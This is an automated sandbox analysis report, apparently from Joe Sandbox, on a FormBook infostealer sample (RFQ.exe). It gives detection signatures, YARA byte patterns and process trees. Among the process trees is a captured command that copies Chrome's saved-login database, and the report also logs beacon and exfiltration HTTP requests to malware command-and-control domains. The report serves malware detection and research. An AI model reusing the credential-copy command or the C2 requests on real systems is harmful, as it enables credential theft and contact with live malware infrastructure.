Play interactive tourEdit tour

# Analysis Report RFQ.exe.vir

## Overview

### General Information

 Sample Name: RFQ.exe.vir (renamed file extension from vir to exe) MD5: 22dc43ed0fab2aca044494cefd0fa2c7 SHA1: e47f39003136287190b347f784122110a12700ed SHA256: faebab8e94693d16273dfd699a3d5067a241b3d544de0a47dd52008ae782c18d Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x64RFQ.exe.exe (PID: 4996 cmdline: 'C:\Users\user\Desktop\RFQ.exe.exe' MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)RFQ.exe.exe (PID: 5408 cmdline: C:\Users\user\Desktop\RFQ.exe.exe MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)RFQ.exe.exe (PID: 4068 cmdline: C:\Users\user\Desktop\RFQ.exe.exe MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)RFQ.exe.exe (PID: 2300 cmdline: C:\Users\user\Desktop\RFQ.exe.exe MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)explorer.exe (PID: 2928 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)cmd.exe (PID: 5640 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)cmd.exe (PID: 5872 cmdline: /c del 'C:\Users\user\Desktop\RFQ.exe.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)cmd.exe (PID: 5452 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)ebplgh1bmx.exe (PID: 2464 cmdline: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)ebplgh1bmx.exe (PID: 5728 cmdline: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)cmmon32.exe (PID: 2644 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18429:$sqlite3step: 68 34 1C 7B E1 • 0x1853c:$sqlite3step: 68 34 1C 7B E1
• 0x18458:$sqlite3text: 68 38 2A 90 C5 • 0x1857d:$sqlite3text: 68 38 2A 90 C5
• 0x1846b:$sqlite3blob: 68 53 D8 7F 8C • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group • 0x18429:$sqlite3step: 68 34 1C 7B E1
• 0x1853c:$sqlite3step: 68 34 1C 7B E1 • 0x18458:$sqlite3text: 68 38 2A 90 C5
• 0x1857d:$sqlite3text: 68 38 2A 90 C5 • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
• 0x18593:$sqlite3blob: 68 53 D8 7F 8C Click to see the 16 entries SourceRuleDescriptionAuthorStrings 29.2.ebplgh1bmx.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security 29.2.ebplgh1bmx.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group • 0x17629:$sqlite3step: 68 34 1C 7B E1
• 0x1773c:$sqlite3step: 68 34 1C 7B E1 • 0x17658:$sqlite3text: 68 38 2A 90 C5
• 0x1777d:$sqlite3text: 68 38 2A 90 C5 • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
• 0x17793:$sqlite3blob: 68 53 D8 7F 8C 29.2.ebplgh1bmx.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8d22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC • 0x149a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14491:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 • 0x14aa7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x14c1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 • 0x989a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1370c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 • 0xa593:$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x19d17:$sequence_8: 3C 54 74 04 3C 74 75 F4 • 0x1ad1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.2.RFQ.exe.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
8.2.RFQ.exe.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x17629:$sqlite3step: 68 34 1C 7B E1 • 0x1773c:$sqlite3step: 68 34 1C 7B E1
• 0x17658:$sqlite3text: 68 38 2A 90 C5 • 0x1777d:$sqlite3text: 68 38 2A 90 C5
• 0x1766b:$sqlite3blob: 68 53 D8 7F 8C • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

## Sigma Overview

### System Summary:

 Source: Process started Author: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5640, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 5452

## Signature Overview

### AV Detection:

 Antivirus / Scanner detection for submitted sample Show sources
 Source: RFQ.exe.exe Avira: detected
 Antivirus detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Wajuduf\ebplgh1bmx.exe Avira: detection malicious, Label: HEUR/AGEN.1046691
 Multi AV Scanner detection for domain / URL Show sources
 Source: http://www.artiyonq.com/m8l/ Virustotal: Detection: 6% Perma Link
 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Wajuduf\ebplgh1bmx.exe Virustotal: Detection: 68% Perma Link Source: C:\Users\user\AppData\Local\Temp\Wajuduf\ebplgh1bmx.exe ReversingLabs: Detection: 62%
 Multi AV Scanner detection for submitted file Show sources
 Source: RFQ.exe.exe Virustotal: Detection: 68% Perma Link Source: RFQ.exe.exe ReversingLabs: Detection: 62%
 Yara detected FormBook Show sources
 Source: Yara match File source: 0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001D.00000002.1278238054.0000000001400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000008.00000002.881220627.00000000007D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000008.00000002.882704990.0000000000D50000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001D.00000002.1277745187.0000000000401000.00000020.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000008.00000002.880507060.0000000000401000.00000020.00000001.sdmp, type: MEMORY Source: Yara match File source: 29.2.ebplgh1bmx.exe.400000.1.unpack, type: UNPACKEDPE Source: Yara match File source: 8.2.RFQ.exe.exe.400000.0.unpack, type: UNPACKEDPE
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 29.2.ebplgh1bmx.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 8.2.RFQ.exe.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

 Contains functionality to enumerate / list files inside a directory Show sources
 Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 6_2_00E360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 6_2_00E360DD Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 6_2_00E363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 6_2_00E363F9 Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 6_2_00E3EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_00E3EB60 Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 6_2_00E36CA9 GetFileAttributesW,FindFirstFileW,FindClose, 6_2_00E36CA9 Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 6_2_00E3F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_00E3F5FA Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 6_2_00E3F56F FindFirstFileW,FindClose, 6_2_00E3F56F Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 6_2_00E41B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00E41B2F Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 6_2_00E41C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00E41C8A Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 6_2_00E41F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_00E41F94

 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 4x nop then pop ebx 8_2_00407AC5 Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 4x nop then pop esi 8_2_00417373 Source: C:\Users\user\Desktop\RFQ.exe.exe Code function: 4x nop then pop edi 8_2_00416D3D Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe Code function: 4x nop then pop ebx 29_2_00407AC5 Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe Code function: 4x nop then pop esi 29_2_00417373 Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe Code function: 4x nop then pop edi 29_2_00416D3D Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop esi 30_2_02567373 Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop edi 30_2_02566D3D

 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /m8l/?tVT=stAPCawU9FsBsDeLDlqawFgIxU41y6VpxlOSmtpgZq2QqlgInUNCOlYAlNLBb+BUECvq&MR-p=0tPLH85x-lH HTTP/1.1Host: www.kmwhbl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m8l/?tVT=lki1ed3GPMN5Nw1jaHFlS3B9RQB9zvXEK7YHw36ZfVLkkOoQWGs0VMlLDODNdBIBI6zD&MR-p=0tPLH85x-lH HTTP/1.1Host: www.addis.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=ovbFtOa4uTjd1a92oYI1beIGZw7s4qusWsZU0rgv2nLP+ugoFD+dLAFKen/jDfcukVqZ HTTP/1.1Host: www.nusaliterainspirasi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=PZkH6llHoqFvvgYvV7p0jyJ4zE2wugCWkpTMu12MC83jrlv2PlfP15O4FxttxOVUzuUw HTTP/1.1Host: www.teccommunications.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m8l/?tVT=HCt+Yhx/h4l+FCj3nKRKOvS7Xa1e0tc/Egfr+bgHKkeQjLAOt82B/JBt+eO2F9D4/3gd&MR-p=0tPLH85x-lH HTTP/1.1Host: www.obsoletelabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m8l/?tVT=5W/5kEIdtxVt3n/xoeTRd2P1yDG4A43nFAD006cGMUhROXoTda6GZj7hA5S0bqxvW5XG&MR-p=0tPLH85x-lH HTTP/1.1Host: www.artiyonq.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=dcH6q++BfneLHwYr+7wkAtOqeHmKUMZpIhb6VvBnwf4Bd/1QFFGV2dHI+mdn934ofCRD HTTP/1.1Host: www.tgers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m8l/?tVT=stAPCawU9FsBsDeLDlqawFgIxU41y6VpxlOSmtpgZq2QqlgInUNCOlYAlNLBb+BUECvq&MR-p=0tPLH85x-lH HTTP/1.1Host: www.kmwhbl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=ovbFtOa4uTjd1a92oYI1beIGZw7s4qusWsZU0rgv2nLP+ugoFD+dLAFKen/jDfcukVqZ HTTP/1.1Host: www.nusaliterainspirasi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 52.58.78.16 52.58.78.16
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.addis.techConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.addis.techUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.addis.tech/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 74 47 75 50 41 39 53 76 64 6f 49 51 66 53 51 4e 65 52 6f 6b 4c 51 35 54 46 41 6c 4f 6b 64 66 5a 62 75 30 44 6b 6e 7e 77 50 48 76 35 68 66 31 4b 53 6b 64 77 64 63 74 50 42 59 47 63 5a 68 34 7a 4a 59 69 34 73 54 4f 54 45 36 36 56 4a 66 53 66 74 7a 43 36 4e 56 37 6d 61 4a 79 73 70 30 46 56 51 31 42 62 47 61 48 4e 4e 6f 6f 41 4f 62 30 6d 54 31 52 5a 45 35 75 74 4b 7a 78 68 50 71 52 35 65 54 43 57 53 7a 49 6c 4c 69 7a 59 6f 72 28 62 4e 55 54 6d 6b 70 44 5a 79 61 7a 53 68 48 50 48 62 74 7e 5a 79 2d 4b 48 65 47 61 6d 38 45 64 2d 68 57 63 6a 6e 31 62 74 50 6e 63 4b 45 4e 67 6c 72 6a 67 46 4f 2d 43 52 4f 52 62 32 6f 53 44 45 71 36 62 58 48 37 76 33 49 4a 6f 74 52 57 73 71 4f 51 28 67 67 52 59 4f 54 49 56 77 6a 6e 7a 57 6e 4a 7e 72 42 61 44 76 70 70 76 5a 70 76 32 37 71 56 6c 79 56 7a 6c 34 36 4f 44 59 7a 66 55 44 65 79 49 6c 69 2d 30 73 74 78 49 4c 59 30 70 5a 4b 4c 48 55 4b 53 6c 6b 54 39 35 39 73 4f 43 45 38 56 53 6f 47 46 51 4e 5a 45 71 38 49 42 6d 4d 78 61 73 76 54 45 6f 6e 62 6a 41 52 51 44 63 44 53 77 36 50 31 6a 75 7a 39 43 73 35 73 76 28 50 31 79 72 64 45 44 39 62 6c 72 78 53 44 30 61 4f 6b 54 4d 4f 58 65 77 36 61 36 42 41 34 4d 36 38 43 34 34 4c 54 4a 43 39 63 36 37 64 43 6a 6e 57 37 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: tVT=tGuPA9SvdoIQfSQNeRokLQ5TFAlOkdfZbu0Dkn~wPHv5hf1KSkdwdctPBYGcZh4zJYi4sTOTE66VJfSftzC6NV7maJysp0FVQ1BbGaHNNooAOb0mT1RZE5utKzxhPqR5eTCWSzIlLizYor(bNUTmkpDZyazShHPHbt~Zy-KHeGam8Ed-hWcjn1btPncKENglrjgFO-CRORb2oSDEq6bXH7v3IJotRWsqOQ(ggRYOTIVwjnzWnJ~rBaDvppvZpv27qVlyVzl46ODYzfUDeyIli-0stxILY0pZKLHUKSlkT959sOCE8VSoGFQNZEq8IBmMxasvTEonbjARQDcDSw6P1juz9Cs5sv(P1yrdED9blrxSD0aOkTMOXew6a6BA4M68C44LTJC9c67dCjnW7g). Source: global traffic HTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.nusaliterainspirasi.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.nusaliterainspirasi.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nusaliterainspirasi.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 67 4e 58 5f 7a 75 72 69 30 6b 50 63 32 61 4e 30 31 4e 46 63 4a 65 38 49 50 6c 48 6a 28 34 62 73 49 72 77 63 6f 4c 45 73 36 6e 62 58 36 50 51 6e 49 44 7a 65 47 41 38 52 4e 47 7e 70 49 5f 73 6e 79 6b 54 71 45 56 7e 55 56 78 69 74 4c 4b 64 50 53 34 6b 79 51 63 37 48 28 51 63 36 30 66 41 37 66 4c 54 56 76 6f 55 4c 7e 2d 70 38 51 55 7e 62 71 6a 7e 39 74 78 53 5a 33 52 53 4f 59 4c 35 4d 36 37 47 72 6a 34 49 46 42 4d 72 4e 56 72 59 48 30 51 4d 75 43 51 4d 41 74 4c 30 71 7a 49 76 67 28 6c 39 37 4c 43 71 76 57 41 73 4e 67 32 4b 38 38 63 6a 36 48 49 55 76 43 59 45 65 36 64 53 59 4b 73 54 2d 6d 34 53 7a 6c 4f 63 74 61 65 35 2d 7a 59 67 32 31 6a 49 58 76 37 45 4c 33 34 51 35 73 6a 79 33 78 53 33 71 7e 49 42 37 34 4a 64 79 39 4a 7a 55 30 67 5a 61 70 31 59 57 4d 6d 38 69 73 58 48 39 51 54 53 35 6d 56 47 49 4d 6b 39 7a 4b 41 34 34 30 61 75 69 7a 39 5a 6e 28 4c 38 76 43 33 68 2d 67 77 7a 6c 39 4c 28 74 4b 6a 52 4c 6e 47 64 4e 73 37 64 68 6d 61 38 2d 59 71 51 46 49 65 5a 79 7e 35 4d 66 62 5a 4c 72 71 5f 47 70 7e 39 79 66 57 35 6e 51 6c 33 6b 6d 68 78 63 79 57 54 37 66 45 4a 34 38 66 72 72 71 6f 5a 47 48 69 4d 6a 4d 6e 5f 33 58 37 52 4a 66 28 59 42 4e 50 74 74 78 63 64 42 75 4d 46 43 38 7a 38 74 4b 30 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: tVT=gNX_zuri0kPc2aN01NFcJe8IPlHj(4bsIrwcoLEs6nbX6PQnIDzeGA8RNG~pI_snykTqEV~UVxitLKdPS4kyQc7H(Qc60fA7fLTVvoUL~-p8QU~bqj~9txSZ3RSOYL5M67Grj4IFBMrNVrYH0QMuCQMAtL0qzIvg(l97LCqvWAsNg2K88cj6HIUvCYEe6dSYKsT-m4SzlOctae5-zYg21jIXv7EL34Q5sjy3xS3q~IB74Jdy9JzU0gZap1YWMm8isXH9QTS5mVGIMk9zKA440auiz9Zn(L8vC3h-gwzl9L(tKjRLnGdNs7dhma8-YqQFIeZy~5MfbZLrq_Gp~9yfW5nQl3kmhxcyWT7fEJ48frrqoZGHiMjMn_3X7RJf(YBNPttxcdBuMFC8z8tK0g). Source: global traffic HTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.nusaliterainspirasi.comConnection: closeContent-Length: 142745Cache-Control: no-cacheOrigin: http://www.nusaliterainspirasi.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nusaliterainspirasi.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 67 4e 58 5f 7a 72 50 32 34 30 4b 53 6e 5a 6b 42 6b 75 4a 78 4f 4f 6b 77 4e 31 4c 6e 32 4c 4b 62 46 59 30 4d 6f 4c 55 6f 33 46 6a 46 77 4f 67 6e 41 67 58 6e 4f 41 38 4f 63 57 7e 71 4d 5f 68 4f 78 32 54 69 45 58 53 2d 56 78 71 75 41 70 46 58 53 6f 6c 71 66 63 48 53 39 55 4d 78 30 64 45 4b 66 70 66 4e 7e 59 49 4c 36 4b 39 45 4e 41 37 46 6a 47 53 79 6e 68 4f 41 37 77 37 61 59 35 39 65 38 65 6e 4d 31 70 6b 44 4d 66 33 57 51 71 6f 76 69 52 45 31 4d 67 49 48 30 49 4a 77 39 50 66 38 72 41 42 64 58 7a 71 73 49 41 30 44 79 68 76 4a 28 64 33 44 58 4a 6b 37 43 62 6b 4f 67 65 48 41 4f 72 7a 4d 68 63 4c 57 77 76 59 72 47 5f 35 6d 6c 74 4d 4c 35 43 34 6f 68 72 55 4d 79 6f 38 57 76 68 4b 6e 37 54 76 52 75 73 77 30 7a 62 45 4e 35 59 33 63 32 67 6f 4f 67 55 41 46 43 53 49 71 70 55 72 4c 61 54 53 61 6b 56 47 55 45 46 4e 50 50 6d 41 78 74 71 65 66 33 38 42 32 75 72 51 73 48 31 46 36 75 30 61 43 28 36 6e 78 65 67 5a 7a 78 56 78 38 6e 35 41 56 74 36 39 6d 52 49 34 43 49 65 5a 32 7e 38 67 6c 4a 59 66 72 34 61 54 6c 75 75 4b 54 51 35 6e 4e 6a 6e 55 6f 71 6a 49 69 57 58 76 66 45 39 38 53 64 64 50 71 74 50 69 45 6a 74 6a 4d 6b 50 33 58 32 78 49 4d 77 37 73 2d 42 72 67 57 4e 75 67 49 4b 79 53 76 39 64 38 76 6e 37 6d 43 31 59 78 35 77 64 7e 48 45 7a 46 62 55 33 6c 55 6e 73 34 41 6b 79 6a 5f 75 55 6b 7a 55 34 6d 58 52 5a 74 31 6c 71 79 66 72 50 67 70 30 47 6e 6b 44 72 63 34 4c 6d 56 47 79 50 6e 4c 4f 42 4d 72 4b 5f 6a 73 47 6f 42 59 59 45 57 35 6f 55 6a 4f 5a 34 6a 48 76 31 4b 51 39 48 48 52 59 52 65 79 62 56 62 4e 51 4e 36 35 4b 35 72 4f 71 6a 45 5f 52 35 28 61 59 35 6b 36 4f 30 4a 32 61 4a 48 49 71 78 71 41 4e 6e 31 75 58 4a 4c 72 64 76 69 5a 66 61 54 78 59 70 76 57 54 44 45 73 43 56 38 77 57 4b 43 4b 7e 71 42 59 4a 35 54 39 31 6e 73 57 59 77 28 6e 7a 74 70 39 34 79 6f 66 69 43 68 71 39 70 30 48 53 38 28 67 74 47 7a 2d 37 69 43 44 36 6b 4b 6e 47 56 36 49 77 37 67 52 77 79 76 4c 65 45 6e 6f 4e 4a 76 4c 37 47 64 36 31 41 45 64 61 62 71 44 58 73 68 39 5a 32 69 68 30 55 46 42 48 48 74 32 6c 65 36 70 43 50 75 74 65 6a 42 39 4c 52 50 5f 45 2d 51 6a 75 73 39 53 43 39 4c 65 65 7a 69 77 4e 57 56 4c 69 2d 56 38 32 39 71 46 44 53 6e 33 67 58 65 55 43 4e 28 45 30 48 31 79 4e 45 59 67 56 79 41 69 7e 6c 7a 53 35 77 49 4b 72 6c 76 4b 4f 7a 46 6c 61 70 63 30 4f 4c 53 6d 6d 6d 54 61 5a 58 6f 62 46 79 30 31 63 58 37 45 69 50 33 37 6d 6f 52 63 57 5a 4c 36 41 68 78 34 6e 6b 57 32 32 42 5a 39 35 63 76 71 59 58 6f 46 7a 44 66 55 64 4a 44 30 51 76 6e 6a 45 7a 77 42 30 77 4a 55 48 66 35 32 31 41 70 78 7a 6c 71 36 71 52 51 77 51 61 34 6a 71 35 58 31 61 5f 4e 4 Source: global traffic HTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.teccommunications.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.teccommunications.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.teccommunications.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 48 37 6f 39 6b 41 63 4c 37 74 77 6b 30 6a 30 7a 61 64 51 39 28 33 42 47 